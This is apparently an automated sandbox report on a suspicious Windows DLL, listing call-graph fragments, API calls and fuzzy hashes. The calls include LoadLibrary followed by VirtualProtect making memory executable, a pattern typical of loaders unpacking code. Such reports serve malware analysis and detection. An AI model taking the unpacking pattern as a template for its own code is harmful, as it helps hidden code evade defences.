20132->20133 20133->20130 20134 6fa5b8a9 _parse_cmdline 72 API calls 20133->20134 20135 6fa5bae0 20134->20135 20135->20130 20137 6fa5b7d4 
20136->20137 20139 6fa5b7d9 _strlen 20136->20139 20138 6fa602ad ___initmbctable 106 API calls 20137->20138 20138->20139 20140 6fa5a608 __calloc_crt 62 API calls 20139->20140 20143 6fa547ca 20139->20143 20145 6fa5b80e _strlen 20140->20145 20141 6fa5b86c 20142 6fa54618 __freebuf 62 API calls 20141->20142 20142->20143 20143->20037 20151 6fa55cbe 20143->20151 20144 6fa5a608 __calloc_crt 62 API calls 20144->20145 20145->20141 20145->20143 20145->20144 20146 6fa5b892 20145->20146 20148 6fa60997 _strcpy_s 62 API calls 20145->20148 20149 6fa5b853 20145->20149 20147 6fa54618 __freebuf 62 API calls 20146->20147 20147->20143 20148->20145 20149->20145 20150 6fa58034 __invoke_watson 10 API calls 20149->20150 20150->20149 20153 6fa55ccc __IsNonwritableInCurrentImage 20151->20153 20501 6fa5df82 20153->20501 20154 6fa55cea __initterm_e 20156 6fa55d09 __IsNonwritableInCurrentImage __initterm 20154->20156 20505 6fa544b4 20154->20505 20156->20037 20158 6fa5a784 HeapDestroy 20157->20158 20159 6fa5a72d 20157->20159 20158->20031 20160 6fa5a772 HeapFree 20159->20160 20161 6fa5a749 VirtualFree HeapFree 20159->20161 20160->20158 20161->20161 20162 6fa5a771 20161->20162 20162->20160 20164 6fa5a0f8 20163->20164 20165 6fa5a0ec 20163->20165 20167 6fa5a10c TlsFree 20164->20167 20168 6fa5a11a 20164->20168 20166 6fa5a033 __decode_pointer 6 API calls 20165->20166 20166->20164 20167->20168 20169 6fa5a7ff DeleteCriticalSection 20168->20169 20170 6fa5a817 20168->20170 20171 6fa54618 __freebuf 62 API calls 20169->20171 20172 6fa5a829 DeleteCriticalSection 20170->20172 20173 6fa5a837 20170->20173 20171->20168 20172->20170 20173->20035 20176 6fa5b786 20174->20176 20175 6fa5b7c8 20175->20029 20176->20175 20177 6fa5b79a DeleteCriticalSection 20176->20177 20178 6fa54618 __freebuf 62 API calls 20176->20178 20177->20176 20178->20176 20551 6fa55d43 20179->20551 20181 6fa55e90 20181->20005 20183 6fa5a3d6 20182->20183 20184 6fa5a421 20182->20184 20185 6fa5a3ff 20183->20185 20186 6fa5a3dc TlsGetValue 
20183->20186 20187 6fa5a434 20184->20187 20188 6fa5a42b TlsSetValue 20184->20188 20190 6fa5a033 __decode_pointer 6 API calls 20185->20190 20186->20185 20189 6fa5a3ef TlsGetValue 20186->20189 20187->20031 20188->20187 20189->20185 20191 6fa5a416 20190->20191 20574 6fa5a299 20191->20574 20194 6fa5a02a __init_pointers 6 API calls 20193->20194 20195 6fa55e9c __init_pointers __initp_misc_winsig 20194->20195 20204 6fa5cdf3 20195->20204 20198 6fa59fb8 __encode_pointer 6 API calls 20199 6fa55ed8 20198->20199 20199->20063 20201 6fa5a7a3 20200->20201 20202 6fa5e1d3 __ioinit InitializeCriticalSectionAndSpinCount 20201->20202 20203 6fa5a550 20201->20203 20202->20201 20203->20052 20203->20073 20205 6fa59fb8 __encode_pointer 6 API calls 20204->20205 20206 6fa55ece 20205->20206 20206->20198 20207->20110 20209 6fa5b8c8 20208->20209 20213 6fa5b935 20209->20213 20218 6fa60a52 20209->20218 20211 6fa5ba33 20211->20130 20211->20131 20212 6fa60a52 72 API calls _parse_cmdline 20212->20213 20213->20211 20213->20212 20215 6fa602b6 20214->20215 20216 6fa602bd 20214->20216 20323 6fa60113 20215->20323 20216->20124 20221 6fa609ff 20218->20221 20224 6fa58659 20221->20224 20225 6fa5866c 20224->20225 20229 6fa586b9 20224->20229 20226 6fa5a27f __getptd 62 API calls 20225->20226 20227 6fa58671 20226->20227 20230 6fa58699 20227->20230 20232 6fa6057a 20227->20232 20229->20209 20230->20229 20247 6fa5fe0e 20230->20247 20233 6fa60586 __freefls@4 20232->20233 20234 6fa5a27f __getptd 62 API calls 20233->20234 20235 6fa6058b 20234->20235 20236 6fa605b9 20235->20236 20238 6fa6059d 20235->20238 20237 6fa5a914 __lock 62 API calls 20236->20237 20239 6fa605c0 20237->20239 20240 6fa5a27f __getptd 62 API calls 20238->20240 20263 6fa6053c 20239->20263 20242 6fa605a2 20240->20242 20244 6fa605b0 __freefls@4 20242->20244 20246 6fa55bff __amsg_exit 62 API calls 20242->20246 20244->20230 20246->20244 20248 6fa5fe1a __freefls@4 20247->20248 20249 6fa5a27f __getptd 62 API calls 20248->20249 20250 6fa5fe1f 20249->20250 

                                          Control-flow Graph

                                          [Control-flow graph; first block 6fa463f0-6fa463f8]
                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FA46602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FA4663B
                                          • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FA46654
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$LibraryLoad
                                          • String ID:
                                          • API String ID: 895956442-0
                                          • Opcode ID: 22dec76dfd963adef61e853e7d269b75f81a611500095538f556627ce03cc013
                                          • Instruction ID: 8e06d585e9b6ba87e0044319e79a531e24cdaaf6f7d0db9edb1164865b3be414
                                          • Opcode Fuzzy Hash: 22dec76dfd963adef61e853e7d269b75f81a611500095538f556627ce03cc013
                                          • Instruction Fuzzy Hash: 3EA1EF305087558FC715CF29C59062AFBE6BFCA304F09896EE89597306D734F996CB82

                                          Control-flow Graph

                                          [Control-flow graph; first block 6fa45ca0-6fa45d95]
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoad_memset
                                          • String ID:
                                          • API String ID: 2997193564-0
                                          • Opcode ID: 2a72012180c450a880e7fd06fc76da2ea50228f30c978f1e1fe08d99d7c38a2e
                                          • Instruction ID: 63871a4e2ca9531b43d0cc59d617f637315fe29fc14592f129026df52db300e9
                                          • Opcode Fuzzy Hash: 2a72012180c450a880e7fd06fc76da2ea50228f30c978f1e1fe08d99d7c38a2e
                                          • Instruction Fuzzy Hash: B1E17BB49087068FC714CF1AC490A2AFBE5FF89314F54892EE89A87351D734F996CB91

                                          Control-flow Graph

                                          [Control-flow graph; first block 6fa45e70-6fa45e86]
                                          APIs
                                          • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FA45ECA
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AllocGlobal
                                          • String ID:
                                          • API String ID: 3761449716-0
                                          • Opcode ID: 0dfeea2bb6be9c70cb3d999346b5ec5f955f6a8132bca538c4c5e5a986e8f6b7
                                          • Instruction ID: 4a22072adcb76c07ebbc940cd871af71fa8fc4ee5c09a7ceb0568ff338f01727
                                          • Opcode Fuzzy Hash: 0dfeea2bb6be9c70cb3d999346b5ec5f955f6a8132bca538c4c5e5a986e8f6b7
                                          • Instruction Fuzzy Hash: 69A18F746083168FC708CF2DC59062AF7E2BF89304F18C56EE89687356D774F9968B92

                                          Control-flow Graph

                                          APIs
                                          • EnterCriticalSection.KERNEL32(6FA732EC,?,?,?,6FA732D0,6FA732D0,?,6FA4C0A4,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4BC61
                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,6FA732D0,6FA732D0,?,6FA4C0A4,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4BCB7
                                          • GlobalHandle.KERNEL32(00D3AED0), ref: 6FA4BCC0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6FA4BCCA
                                          • GlobalReAlloc.KERNEL32(6FA6C168,00000000,00002002), ref: 6FA4BCE3
                                          • GlobalHandle.KERNEL32(00D3AED0), ref: 6FA4BCF5
                                          • GlobalLock.KERNEL32(00000000), ref: 6FA4BCFC
                                          • LeaveCriticalSection.KERNEL32(?,?,?,6FA732D0,6FA732D0,?,6FA4C0A4,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4BD05
                                          • GlobalLock.KERNEL32(00000000), ref: 6FA4BD11
                                          • _memset.LIBCMT ref: 6FA4BD2B
                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 6FA4BD59
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                          • String ID:
                                          • API String ID: 496899490-0
                                          • Opcode ID: ba8f1c5bd9e154c17dd05b3a68a2702d8096952fdc3f418aa81c4e4b62309855
                                          • Instruction ID: dcc75797440139d1d153da24f27fc651e1eff347071ea67c9ae3bd75037614f5
                                          • Opcode Fuzzy Hash: ba8f1c5bd9e154c17dd05b3a68a2702d8096952fdc3f418aa81c4e4b62309855
                                          • Instruction Fuzzy Hash: B631CD71604B04AFDB20CF74C889A5EBBF9FF46354B048A6AE552D7280DB38F891CB50

                                          Control-flow Graph

                                          [Control-flow graph; first block 6fa464e0-6fa464e8]
                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FA46602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FA4663B
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoadProtectVirtual
                                          • String ID:
                                          • API String ID: 3279857687-0
                                          • Opcode ID: c00cb2a00adec652a1d924a16ec15419391e07984e3a669432b3419006ed3d2f
                                          • Instruction ID: 4250b191b273d92c18ff70273aa533195f65dd3e719c3293b732aa87e0d3463a
                                          • Opcode Fuzzy Hash: c00cb2a00adec652a1d924a16ec15419391e07984e3a669432b3419006ed3d2f
                                          • Instruction Fuzzy Hash: 2351F3306083558FC715CF29C890A2AFBF6BFCA308F09896DE89547316C634F946CB96

                                          Control-flow Graph

                                          [Control-flow graph; first block 6fa46750-6fa46762]
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FA6C168), ref: 6FA46300
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 3bd791c42a7e11582e651b13e136f0c68bf9a8c4723c30d161376f4b6b231bc9
                                          • Instruction ID: 2fce241eed77fec2c8c294324a08100cd0bcaaa3b941433dbab2ede5035dc7b1
                                          • Opcode Fuzzy Hash: 3bd791c42a7e11582e651b13e136f0c68bf9a8c4723c30d161376f4b6b231bc9
                                          • Instruction Fuzzy Hash: C141CF356087558FC708CF19C890A7AF7E2FFC6324F18896DE88997316D635F8968B80

                                          APIs
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FA6C168), ref: 6FA46300
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 41efa1666756047cae4f85fa81840d965845a7e62580bc1e0985e7dd3c1cde20
                                          • Instruction ID: 13ca562090f65253a11a26ca8e3272582f61a284697e0244ac8429360f5ab986
                                          • Opcode Fuzzy Hash: 41efa1666756047cae4f85fa81840d965845a7e62580bc1e0985e7dd3c1cde20
                                          • Instruction Fuzzy Hash: 9731DF35A087458FC718CF19C89066AF7E2BFCA314F19C96DE88557316D634F896CB81

                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FA4C057
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: H_prolog3$Exception@8Throw
                                          • String ID:
                                          • API String ID: 2489616738-0
                                          • Opcode ID: 3320b2b07744822e9c8c2159f7b9bcf6e99932412156665e67cd5c989bbab1d6
                                          • Instruction ID: 8b78ec9fd180a1b24cea539d83a26f205ae1429277da3fa0ea38c0afbf8401d6
                                          • Opcode Fuzzy Hash: 3320b2b07744822e9c8c2159f7b9bcf6e99932412156665e67cd5c989bbab1d6
                                          • Instruction Fuzzy Hash: 4701BC35200712CBDB18AF34C91176D76A2AF913A4F15853CD4958B3E0DF39D9D68B90

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FA460F6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 214161c2327c1a7079b2dec032040ccb213644b88f76ecebc418cdd9eab7e3a9
                                          • Instruction ID: d00d582371744cfb01009ddf60e02599622ac879970694a082cdd25927ebf0dc
                                          • Opcode Fuzzy Hash: 214161c2327c1a7079b2dec032040ccb213644b88f76ecebc418cdd9eab7e3a9
                                          • Instruction Fuzzy Hash: F701E8B49087119FC718CF0AC89091AFBE6FFC9314F16856DA84897316D630E855CF85

                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FA54776,00000001,?,?,?,6FA548EF,?,?,?,6FA6E848,0000000C,6FA549AA), ref: 6FA5A709
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateHeap
                                          • String ID:
                                          • API String ID: 10892065-0
                                          • Opcode ID: e1802dd941dbf5e8fe74c579636b1cc76f2af4d9f345ee4bde7c8036fc67f70c
                                          • Instruction ID: 8b0281f73262b77c9063086c8f7ee5eb4c0e8aa49060ee1bd89c7f77f4d501e5
                                          • Opcode Fuzzy Hash: e1802dd941dbf5e8fe74c579636b1cc76f2af4d9f345ee4bde7c8036fc67f70c
                                          • Instruction Fuzzy Hash: CBD05E36698B549EDB109E766C08B263BED9B857A6F148835F80CC6180F674D5A18A04
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FA47498
                                          • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FA476D5,?,00000000,?,00000000,00000104,00000000,?,6FA6BEF4,00000000), ref: 6FA474D6
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FA47546
                                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FA4756D
                                          • CharUpperW.USER32(00000000), ref: 6FA475A0
                                          • FindFirstFileW.KERNEL32(?,?), ref: 6FA475BC
                                          • FindClose.KERNEL32(00000000), ref: 6FA475C8
                                          • lstrlenW.KERNEL32(?), ref: 6FA475E6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                          • String ID:
                                          • API String ID: 624941980-0
                                          • Opcode ID: 1f5bcd9e20b17e59966aec657a61533d31b7f3167ce270f2ea363385d3d219cc
                                          • Instruction ID: 9d539197efe3b7293d736a608c1706d57325ffbdfacb47a893948a629566a197
                                          • Opcode Fuzzy Hash: 1f5bcd9e20b17e59966aec657a61533d31b7f3167ce270f2ea363385d3d219cc
                                          • Instruction Fuzzy Hash: B041C0709083559BDF15AF74CD88BBEBB7DAF02318F0442D8E829A5190DB399AD5CF21
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 6FA57C6C
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FA57C81
                                          • UnhandledExceptionFilter.KERNEL32(6FA6A4B8), ref: 6FA57C8C
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6FA57CA8
                                          • TerminateProcess.KERNEL32(00000000), ref: 6FA57CAF
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: a16689c1e86c82e64bc411981a73786f995536e882668bc04b237678c2345908
                                          • Instruction ID: b91924a47f7888e767328f646e7978f1bd0d3d36e5d16729d292ba0e624f86c3
                                          • Opcode Fuzzy Hash: a16689c1e86c82e64bc411981a73786f995536e882668bc04b237678c2345908
                                          • Instruction Fuzzy Hash: 7721F4B9816B24DFEB40DF68D945E593BF8BB0A325F50C019E8089B390E77494A38F81
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FA489FC
                                          • __snwprintf_s.LIBCMT ref: 6FA48A2E
                                          • LoadLibraryW.KERNEL32(?), ref: 6FA48A69
                                            • Part of subcall function 6FA55348: __getptd_noexit.LIBCMT ref: 6FA55348
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                                          • String ID: LOC
                                          • API String ID: 3175857669-519433814
                                          • Opcode ID: fac08e1e381f87f99a97caaa3e4bbd7589c3e2efeb757c8f5a07e96dce7ed4e8
                                          • Instruction ID: ce9a46dd9a8361394ff9fc8a9ace91b655decbf6fc6e9381964843bce66bd9eb
                                          • Opcode Fuzzy Hash: fac08e1e381f87f99a97caaa3e4bbd7589c3e2efeb757c8f5a07e96dce7ed4e8
                                          • Instruction Fuzzy Hash: 2E110671A64308AFDB10AB78DD58BAE77ACAF0236CF050075A114A70C0DBBC9AD4C7B1
                                          APIs
                                            • Part of subcall function 6FA52C57: GetWindowLongW.USER32(?,000000F0), ref: 6FA52C62
                                          • GetKeyState.USER32(00000010), ref: 6FA50514
                                          • GetKeyState.USER32(00000011), ref: 6FA5051D
                                          • GetKeyState.USER32(00000012), ref: 6FA50526
                                          • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6FA5053C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: State$LongMessageSendWindow
                                          • String ID:
                                          • API String ID: 1063413437-0
                                          • Opcode ID: b703ceb98914a1bcda390b17911af9de18d697629086ee9869a931aad5c10feb
                                          • Instruction ID: bfb4edd0a8620786adfe36bfe58103321c5d891fa8ac32786dfbde0e27f02629
                                          • Opcode Fuzzy Hash: b703ceb98914a1bcda390b17911af9de18d697629086ee9869a931aad5c10feb
                                          • Instruction Fuzzy Hash: D5F0E975BC078FA5EA1026744F41FF9052C4F81BDCF04D0326645EA0C0CEB8C4A24570
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c21d8fd1813e8ff8d5169c09b7967652a352a7ca489d5cedbecf32042046658
                                          • Instruction ID: 0d46d17c1fad4698a0bc48e67c8cc921eba6e2e55e8130153b9cd2901d34354f
